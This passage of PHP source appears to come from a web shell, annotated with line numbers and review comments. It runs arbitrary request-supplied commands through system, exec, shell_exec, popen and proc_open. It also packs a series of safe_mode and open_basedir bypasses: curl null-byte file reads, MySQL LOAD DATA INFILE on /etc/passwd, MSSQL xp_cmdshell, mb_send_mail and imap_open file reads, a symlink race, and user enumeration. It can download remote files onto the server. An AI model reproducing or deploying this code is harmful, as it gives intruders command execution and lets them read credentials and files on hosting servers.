  3785.  else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
  3786.  @ftp_close($connection);
  3787.  }
  // Start of the result pane. When no command is left in cmd, a default is
  // chosen: "dir" or "ls -lia" without safe_mode, or the internal "safe_dir"
  // listing with safe_mode. Every plain page view without safe_mode therefore
  // ends up with a directory-listing command in cmd, which the generic
  // ex($_POST['cmd']) call further down the page then runs.
  // cmd is echoed into the page without HTML escaping.
  3788. echo $table_up3;
  3789.  
  3790. if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
  3791. else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
  3792. echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
  3793.  
  3794.  
  3795.  
  3796.  
  // Four alternative ways of printing the file named in $file, selected by
  // $method: file(), fopen()/fread(), show_source() and readfile().
  // NOTE(review): $method and $file are not assigned in the visible part of
  // the page; presumably they arrive from the request (e.g. via
  // register_globals, which the page reports on above) - confirm.
  // File contents and the $file name are written to the page unescaped.
  // Each branch touches the file twice (once for the check, once for the
  // output), except readfile, which streams it inside the condition.
  3797. if ($method=="file") {
  3798.                         if (@file($file)) {
  3799.                                 $filer = file($file);
  3800.  
  3801.                                 foreach ($filer as $a) { echo $a; }
  3802.  
  3803.                         } else {
  3804.                                 echo "<script> alert(\"unable to read file: $file using: file\"); </script>";
  3805.                         }
  3806.                 }
  3807.                 if ($method=="fread") {
  3808.                         if (@fopen($file, 'r')) {
  3809.                                 $fp = fopen($file, 'r');
  3810.                                 $string = fread($fp, filesize($file));
  3811.                                 echo "<pre>";
  3812.                                 echo $string;
  3813.                                 echo "</pre>";
  3814.                         } else {
  3815.                                 echo "<script> alert(\"unable to read file: $file using: fread\"); </script>";
  3816.                         }
  3817.                 }
  3818.                 if ($method=="show_source") {
  3819.                         if (show_source($file)) {
  3820.                                 echo "<pre>";
  3821.                                 echo show_source($file);
  3822.                                 echo "</pre>";
  3823.                         } else {
  3824.                                 echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>";
  3825.                         }
  3826.  
  3827.                 }
  3828.                 if ($method=="readfile") {
  3829.                         echo "<pre>";
  3830.                         if (readfile($file)) {
  3831.                                 //echo "<pre>";
  3832.                                 //echo readfile($file);
  3833.                                 echo "</pre>";
  3834.                         } else {
  3835.                                 echo "</pre>";
  3836.                                 echo "<script> alert(\"unable to read file: $file using: readfile\"); </script>";
  3837.                         }
  3838.  
  3839.                 }
  3840.  
  // dozip1($link, $file): reads $link in 1024-byte chunks until EOF and writes
  // the accumulated data to $file. Despite the name, no archive handling
  // happens here; it is a plain copy from one stream to a local path.
  // Neither fopen() result is checked and both calls suppress errors with @.
  // NOTE(review): $link is presumably a URL or local path taken from the
  // request - see the caller.
  3841. function dozip1($link,$file)
  3842. {
  3843.    $fp = @fopen($link,"r");
  3844.    while(!feof($fp))
  3845.    {
  3846.        $cont.= fread($fp,1024);
  3847.    }
  3848.    fclose($fp);
  3849.  
  3850.    $fp2 = @fopen($file,"w");
  3851.    fwrite($fp2,$cont);
  3852.    fclose($fp2);
  3853. }
  // Calls dozip1() with POST funzip as the source and POST fzip as the
  // destination path whenever funzip is present; both values are passed
  // through unchanged.
  3854. if (isset($_POST['funzip']))
  3855. {
  3856. dozip1($_POST['funzip'],$_POST['fzip']);
  3857. }
  // Takes the starting directory for the glob() probing below from POST root;
  // $root stays unset when the field is empty.
  3858. if(empty($_POST['root'])){
  3859. } else {
  3860.    $root = $_POST['root']; }
  3861.  
  3862.  
  3863.  
  3864.  
  // Directory-name probing through PHP warnings. eh() (defined further down)
  // is installed as the error handler; it records the path quoted in
  // "SAFE MODE Restriction in effect" warnings into $D. The loops call glob()
  // on $root + "/" + a 1..4 character prefix + "*" and descend one character
  // deeper only when the previous glob() added a new entry to $D.
  // glob()'s return value is never used; only the handler's side effect
  // matters.
  // The loops run on every request, whether or not POST root was supplied; the
  // collected names are printed only when $_REQUEST['root'] is set.
  // set_error_handler() stays in effect for the rest of the request, and eh()
  // does nothing with non-matching messages, so later PHP warnings in this
  // page are silently dropped.
  3865.   $c = 0; $D = array();
  3866.   set_error_handler("eh");
  3867.  
  3868.   $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
  3869.  
  3870.   for($i=0; $i < strlen($chars); $i++){
  3871.   $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
  3872.  
  3873.   $prevD = $D[count($D)-1];
  3874.   glob($path."*");
  3875.  
  3876.         if($D[count($D)-1] != $prevD){
  3877.  
  3878.         for($j=0; $j < strlen($chars); $j++){
  3879.  
  3880.            $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
  3881.  
  3882.            $prevD2 = $D[count($D)-1];
  3883.            glob($path."*");
  3884.  
  3885.               if($D[count($D)-1] != $prevD2){
  3886.  
  3887.  
  3888.                  for($p=0; $p < strlen($chars); $p++){
  3889.  
  3890.                  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
  3891.  
  3892.                  $prevD3 = $D[count($D)-1];
  3893.                  glob($path."*");
  3894.  
  3895.                     if($D[count($D)-1] != $prevD3){
  3896.  
  3897.  
  3898.                        for($r=0; $r < strlen($chars); $r++){
  3899.  
  3900.                        $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
  3901.                        glob($path."*");
  3902.  
  3903.                        }
  3904.  
  3905.                     }
  3906.  
  3907.                  }
  3908.  
  3909.               }
  3910.  
  3911.         }
  3912.  
  3913.         }
  3914.  
  3915.   }
  3916.  
  3917.   $D = array_unique($D);
  3918.  
  3919.  
  3920.  
  3921.  
  3922.   foreach($D as $item)
  3923.   if(isset($_REQUEST['root']))
  3924.   echo "{$item}\n";
  3925.  
  3926.  
  3927.  
  3928.  
  // eh(): error handler installed by the glob() probing code above.
  // Matches the text of a "SAFE MODE Restriction in effect" warning and stores
  // the second capture group (the part between "is not allowed to access" and
  // "owned by uid") in the global list $D at index $c.
  // Messages that do not match are ignored and nothing is logged or returned,
  // so while this handler is installed PHP warnings are effectively swallowed.
  // $errno, $errfile and $errline are unused; the global $i is declared but
  // not used in the body.
  3929.   function eh($errno, $errstr, $errfile, $errline){
  3930.  
  3931.      global $D, $c, $i;
  3932.      preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
  3933.      if($o){ $D[$c] = $o[2]; $c++;}
  3934.  
  3935.   }
  3936.  
  3937.  
  3938.  
  3939.  
  3940.  
  // Main dispatch for the command left in $_POST['cmd'].
  // With safe_mode on, only the internal 'safe_dir' command is handled: it
  // lists $dir with dir()/stat() instead of spawning a process. Note that
  // stat(), is_dir() and fileperms() receive the bare entry name, not
  // $dir + name.
  // With safe_mode off, every cmd value except the four names in the else-if
  // is passed to ex() and the HTML-escaped output is printed. This is the sink
  // for all command strings assembled by the handlers earlier in the page.
  // NOTE(review): ex() and perms() are defined elsewhere; ex() presumably runs
  // the string through whichever PHP process-execution function is available
  // - confirm. Shell processes spawned by the PHP/web-server account on
  // requests to this script are the corresponding process-telemetry signal.
  3941. if($safe_mode)
  3942. {
  3943.  switch($_POST['cmd'])
  3944.  {
  3945.  case 'safe_dir':
  3946.   $d=@dir($dir);
  3947.   if ($d)
  3948.    {
  3949.    while (false!==($file=$d->read()))
  3950.     {
  3951.      if ($file=="." || $file=="..") continue;
  3952.      @clearstatcache();
  3953.      list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
  3954.      if(!$unix){
  3955.      echo date("d.m.Y H:i",$mtime);
  3956.      if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
  3957.      }
  3958.      else{
  3959.      $owner = @posix_getpwuid($uid);
  3960.      $grgid = @posix_getgrgid($gid);
  3961.      echo $inode." ";
  3962.      echo perms(@fileperms($file));
  3963.      printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
  3964.      echo date("d.m.Y H:i ",$mtime);
  3965.      }
  3966.      echo "$file\n";
  3967.     }
  3968.    $d->close();
  3969.    }
  3970.   else echo $lang[$language._text29];
  3971.  break;
  3972.     }
  3973. }
  3974. else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
  3975.  $cmd_rep = ex($_POST['cmd']);
  3976.  if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
  3977.  else { echo @htmlspecialchars($cmd_rep)."\n"; }}
  3978.  if($_POST['cmd'])
  3979. {
  3980.  switch($_POST['cmd'])
  3981.  {
  3982.   case 'test1':
  3983.   $ci = @curl_init("file://".$_POST['test1_file']."");
  3984.   $cf = @curl_exec($ci);
  3985.   echo $cf;
  3986.   break;
  3987.   case 'test2':
  3988.   @include($_POST['test2_file']);
  3989.   break;
  3990.   case 'mysqlb':
  3991.  
  3992. $mhost = "localhost";
  3993. $muser = $_POST['test3_ml'];
  3994. $mpass = $_POST['test3_mp'];
  3995. $mdb   = $_POST['test3_md'];
  3996. $file = $_POST['test3_file'];
  3997.  
  3998. // default mysql_read files [seperated by: ':']:
  3999. $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
  4000. $mysql_files = explode(':', $mysql_files_str);
  4001.  
  4002.  
  4003.                                                                 $sql = array (
  4004.                                                                    "USE $mdb",
  4005.  
  4006.                                                                    'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
  4007.  
  4008.                                                                    "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
  4009.                                                                    . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
  4010.                                                                    . "ESCAPED BY          '' "
  4011.                                                                    . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
  4012.  
  4013.                                                                    "SELECT a FROM $tbl LIMIT 1"
  4014.                                                                 );
  4015.  
  4016.  
  4017.                                                                 mysql_connect ($mhost, $muser, $mpass);
  4018.  
  4019.                                                                 foreach ($sql as $statement) {
  4020.                                                                    $q = mysql_query ($statement);
  4021.  
  4022.                                                                    if ($q == false) die (
  4023.                                                                       "FAILED: " . $statement . "\n" .
  4024.                                                                       "REASON: " . mysql_error () . "\n"
  4025.                                                                    );
  4026.  
  4027.                                                                    if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
  4028.  
  4029.                                                                    echo htmlspecialchars($r[0]);
  4030.                                                                    mysql_free_result ($q);
  4031.                                                                 }
  4032.  
  4033.  
  4034. echo "</textarea>";
  4035.  
  4036.  break;
  4037.   case 'test4':
  4038.   if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
  4039.   $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
  4040.   if($db)
  4041.    {
  4042.    if(@mssql_select_db($_POST['test4_md'],$db))
  4043.     {
  4044.      @mssql_query("drop table ly0kha_temp_table",$db);
  4045.      @mssql_query("create table ly0kha_temp_table ( string VARCHAR (500) NULL)",$db);
  4046.      @mssql_query("insert into ly0kha_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
  4047.      $res = mssql_query("select * from ly0kha_temp_table",$db);
  4048.      while(($row=@mssql_fetch_row($res)))
  4049.       {
  4050.       echo $row[0]."\r\n";
  4051.       }
  4052.     @mssql_query("drop table ly0kha_temp_table",$db);
  4053.     }
  4054.     else echo "[-] ERROR! Can't select database";
  4055.    @mssql_close($db);
  4056.    }
  4057.   else echo "[-] ERROR! Can't connect to MSSQL server";
  4058.   break;
  4059.   case 'test5':
  4060.   if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
  4061.   $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
  4062.   @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
  4063.   $lines = file ('/tmp/mb_send_mail');
  4064.   foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
  4065.   break;
  4066.   case 'test6':
  4067.   $stream = @imap_open('/etc/passwd', "", "");
  4068.   $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
  4069.   for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
  4070.   @imap_close($stream);
  4071.   break;
  4072.   case 'test7':
  4073.   $stream = @imap_open($_POST['test7_file'], "", "");
  4074.   $str = @imap_body($stream, 1);
  4075.   echo $str;
  4076.   @imap_close($stream);
  4077.   break;
  4078.   case 'test8':
  4079.   if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
  4080.   else echo $lang[$language.'_text119'];
  4081.   break;
  4082. case 'cURL':
  4083.    if(empty($_POST['ly0kha'])){
  4084.  
  4085.  
  4086. } else {
  4087. $curl=$_POST['ly0kha'];
  4088. $ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
  4089. curl_exec($ch);
  4090. var_dump(curl_exec($ch));
  4091. echo "</textarea></CENTER>";
  4092.  
  4093. }
  4094. break;
  4095. case 'copy':
  4096.  
  4097. if(empty($snn)){
  4098. if(empty($_GET['snn'])){
  4099. if(empty($_POST['snn'])){
  4100.  
  4101. } else {
  4102. $u1p=$_POST['snn'];
  4103. }
  4104. } else {
  4105. $u1p=$_GET['snn'];
  4106. }
  4107. }
  4108.   $u1p=""; // File to Include... or use _GET _POST
  4109. $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
  4110.  
  4111.  
  4112. $temp=tempnam($tymczas, "cx");
  4113.  
  4114. if(copy("compress.zlib://".$snn, $temp)){
  4115. $zrodlo = fopen($temp, "r");
  4116. $tekst = fread($zrodlo, filesize($temp));
  4117. fclose($zrodlo);
  4118. echo "".htmlspecialchars($tekst)."";
  4119. unlink($temp);
  4120. echo "</textarea></CENTER>";
  4121. }
  4122. break;
  4123. case 'ini_restore':
  4124.  if(empty($_POST['ini_restore'])){
  4125. } else {
  4126.  
  4127. $ini=$_POST['ini_restore'];
  4128. echo ini_get("safe_mode");
  4129. echo ini_get("open_basedir");
  4130. require_once("$ini");
  4131. ini_restore("safe_mode");
  4132. ini_restore("open_basedir");
  4133. echo ini_get("safe_mode");
  4134. echo ini_get("open_basedir");
  4135. include($_GET["ss"]);
  4136. echo "</textarea></CENTER>";
  4137. }
  4138. break;
  4139. case 'glob':
  // reg_glob(): takes the `glob` request parameter, appends "*" and prints
  // every path glob() returns, one per line. The parameter is used as a path
  // prefix without any restriction, so the caller of the page chooses which
  // directory is listed.
  // The function is declared inside a switch case, so it only exists once that
  // case has executed.
  4140. function reg_glob()
  4141. {
  4142. $chemin=$_REQUEST['glob'];
  4143. $files = glob("$chemin*");
  4144.  
  4145.  
  4146. foreach ($files as $filename) {
  4147.  
  4148.    echo "$filename\n";
  4149.  
  4150. }
  4151. }
  4152.  
  4153. if(isset($_REQUEST['glob']))
  4154. {
  4155. reg_glob();
  4156. }
  4157.  
  4158. break;
  4159. case 'zend':
  4160.  if(empty($_POST['zend'])){
  4161. } else {
  4162.  
  4163. $dezend=$_POST['zend'];
  4164. include($_POST['zend']);
  4165. print_r($GLOBALS);
  4166. require_once("$dezend");
  4167. echo "</textarea></p>";
  4168. }
  4169. break;
  4170.   case 'sym1':
  4171.      if(empty($_POST['sym1p'])){
  4172.              } else {
  4173. $symp=$_POST['sym1p'];
  4174.          }
  4175.      if(empty($_POST['sym1p2'])){
  4176.  
  4177. } else {
  4178. $symp2=$_POST['sym1p2'];
  4179.  
  4180.   symlink("a/a/a/a/a/a/", "dummy");
  4181. symlink("dummy".$symp2."".$symp."", "xxx");
  4182. unlink("dummy");
  4183. while (1) {
  4184. symlink(".", "dummy");
  4185.  
  4186.   }
  4187.  }
  4188.   break;
  4189.   case 'sym2':
  4190.   @include(xxx);
  4191.   break;
  4192.  
  4193.   case 'plugin':
  4194.   if ($_POST['plugin'] ){
  4195.  
  4196.  
  4197.                                            for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
  4198.                                         $ara = posix_getpwuid($uid);
  4199.                                                 if (!empty($ara)) {
  4200.                                                   while (list ($key, $val) = each($ara)){
  4201.                                                     print "$val:";
  4202.                                                   }
  4203.                                                   print "\n";
  4204.                                                 }
  4205.                                         }
  4206.                                  echo "</textarea>";
  4207.  
  4208.              }
  4209.         break;
  4210.         case 'command':
  4211.           if (!empty($_POST['command'])) {
  4212.  
  4213.                 if ($method=="system") {
  4214.                 system($_POST['command']);
  4215.                 echo "Functions system";
  4216.                 }
  4217.                 if ($method=="passthru") {
  4218.                 passthru($_POST['command']);
  4219.                 echo "Functions passthru";
  4220.                 }
  4221.                 if ($method=="exec") {
  4222.                         $string = exec($_POST['command']);
  4223.                         echo $string;
  4224.                         echo "Functions exec";
  4225.  
  4226.                 }
  4227.                 if ($method=="shell_exec") {
  4228.                 $string = shell_exec($_POST['command']);
  4229.                 echo $string;
  4230.                 echo "Functions shell_exec";
  4231.                 }
  4232.                 if ($method=="popen") {
  4233.                 $pp = popen($_POST['command'], 'r');
  4234.                 $read = fread($pp, 2096);
  4235.                 echo $read;
  4236.                 pclose($pp);
  4237.                 echo "Functions popen";
  4238.                   }
  4239.  
  4240.           if ($method=="proc_open") {
  4241.  
  4242.  
  4243. $command  = isset($_POST['command'])  ? $_POST['command']  : '';
  4244.  
  4245.  
  4246.  
  4247. /* Load the configuration. */
  4248.  
  4249. /* Default settings --- these settings should always be set to something. */
  4250.  
  4251. /* Merge settings. */
  4252.  
  4253. session_start();
  4254.  
  4255.  
  4256.  
  4257.     if (!empty($command)) {
  4258.         /* Save the command for later use in the JavaScript.
  4259.          * If the command is already in the history, then the
  4260.          * old entry is removed before the new entry is put
  4261.          * into the list at the front.
  4262.          */
  4263.         if (($i = array_search($_POST['command'], $_SESSION['history'])) !== false)
  4264.             unset($_SESSION['history'][$i]);
  4265.  
  4266.         array_unshift($_SESSION['history'], $_POST['command']);
  4267.  
  4268.         /* Now append the command to the output. */
  4269.         $_SESSION['output'] .= '$ ' . $_POST['command'] . "\n";
  4270.  
  4271.         /* Initialize the current working directory. */
  4272.         if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_POST['command'])) {
  4273.             $_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
  4274.         } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_POST['command'], $regs)) {
  4275.             /* The current command is a 'cd' command which we have to handle
  4276.              * as an internal shell command. */
  4277.  
  4278.             if ($regs[1]{0} == '/') {
  4279.                 /* Absolute path, we use it unchanged. */
  4280.                 $new_dir = $regs[1];
  4281.             } else {
  4282.                 /* Relative path, we append it to the current working
  4283.                  * directory. */
  4284.                 $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
  4285.             }
  4286.  
  4287.             /* Transform '/./' into '/' */
  4288.             while (strpos($new_dir, '/./') !== false)
  4289.                 $new_dir = str_replace('/./', '/', $new_dir);
  4290.  
  4291.             /* Transform '//' into '/' */
  4292.             while (strpos($new_dir, '//') !== false)
  4293.                 $new_dir = str_replace('//', '/', $new_dir);
  4294.  
  4295.             /* Transform 'x/..' into '' */
  4296.             while (preg_match('|/\.\.(?!\.)|', $new_dir))
  4297.                 $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
  4298.  
  4299.             if ($new_dir == '') $new_dir = '/';
  4300.  
  4301.             /* Try to change directory. */
  4302.             if (@chdir($new_dir)) {
  4303.                 $_SESSION['cwd'] = $new_dir;
  4304.             } else {
  4305.                 $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
  4306.             }
  4307.  
  4308.         } elseif (trim($_POST['command']) == 'exit') {
  4309.             logout();
  4310.         } else {
  4311.  
  4312.             /* The command is not an internal command, so we execute it after
  4313.              * changing the directory and save the output. */
  4314.             chdir($_SESSION['cwd']);
  4315.  
  4316.             // We cannot use putenv() in safe mode.
  4317.             if (!ini_get('safe_mode')) {
  4318.                 // Advise programs (ls for example) of the terminal size.
  4319.                 putenv('ROWS=' . $rows);
  4320.                 putenv('COLUMNS=' . $columns);
  4321.             }
  4322.  
  4323.             /* Alias expansion. */
  4324.             $length = strcspn($_POST['command'], " \t");
  4325.             $token